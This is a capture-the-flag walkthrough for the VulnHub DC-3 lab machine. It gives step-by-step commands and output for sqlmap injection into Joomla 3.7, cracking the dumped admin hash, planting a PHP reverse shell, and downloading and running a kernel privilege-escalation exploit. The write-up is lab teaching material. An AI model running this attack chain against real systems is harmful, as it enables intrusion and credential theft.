Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


02/12/2024 Shad Hussain Knowledge Views 220 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC3 - VulnHub 

Machine Link : https://www.vulnhub.com/entry/dc-32,312/


STEP1
nmap 192.168.31.62 -p- -Pn -A -T4
FINDING
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
------------------------------------------------------------------------------------------------------------
STEP2
dirb http://192.168.31.62/

dirb http://192.168.31.62/ -X .txt
FINDING
== DIRECTORY: http://192.168.31.62/administrator/ 
http://192.168.31.62/README.txt

* Joomla! 3.7 version history - https://docs.joomla.org/Joomla_3.7_version_history

------------------------------------------------------------------------------------------------------------
STEP3
search exploit for joomla 3.7 in google
FINDING
https://www.exploit-db.com/exploits/42033

------------------------------------------------------------------------------------------------------------
STEP4
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
FINDING
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
------------------------------------------------------------------------------------------------------------
STEP5
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+
------------------------------------------------------------------------------------------------------------
STEP6
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users -C name,password --dump --batch
FINDING
Table: #__users
[1 entry]
+--------+--------------------------------------------------------------+
| name   | password                                                     |
+--------+--------------------------------------------------------------+
| admin  | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+--------+--------------------------------------------------------------+
echo $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu  dc3hash.txt
john dc3hash.txt
snoopy -- is the password
------------------------------------------------------------------------------------------------------------
STEP7
http://192.168.31.62/administrator/ 
admin -- snoopy
------------------------------------------------------------------------------------------------------------
STEP8
visit -- http://192.168.31.62/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA%3D%3D

make changes in index.php
replace all code with php revershell code
save it
and on new terminal
nc -nvlp 1234
on new browser 
http://192.168.31.62/templates/beez3/index.php

get reverse shell
------------------------------------------------------------------------------------------------------------
STEP9
on shell
python -c import pty; pty.spawn("/bin/bash")
uname -a
lsb_release -a
FINDING
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
------------------------------------------------------------------------------------------------------------
STEP10
on new terminal
searchsploit ubuntu 16.04
FINDING
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() bpf(BPF_PROG_LOAD) Privilege Es | linux/local/39772.txt
------------------------------------------------------------------------------------------------------------
STEP11
search in exploitdb
https://www.exploit-db.com/exploits/39772

at bottom of exploit text you will find the download link
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

in nc terminal
cd /tmp
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

unzip 39772
ls
FINDING
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
------------------------------------------------------------------------------------------------------------
STEP12
importants
inflating: __MACOSX/39772/._exploit.tar
inflating: __MACOSX/39772/._crasher.tar
in nc terminal
tar -xvf exploit.tar
ls
cd cd ebpf_mapfd_doubleput_exploit
FINDING
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
------------------------------------------------------------------------------------------------------------
STEP13
./compile.sh
./doubleput
whoami
root
cd /root
ls
the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| _ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope youve enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
-------------------------------------------------------------------------------------------------------------

No article(s) with matching content

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 




© mutebreak.com | All Rights Reserved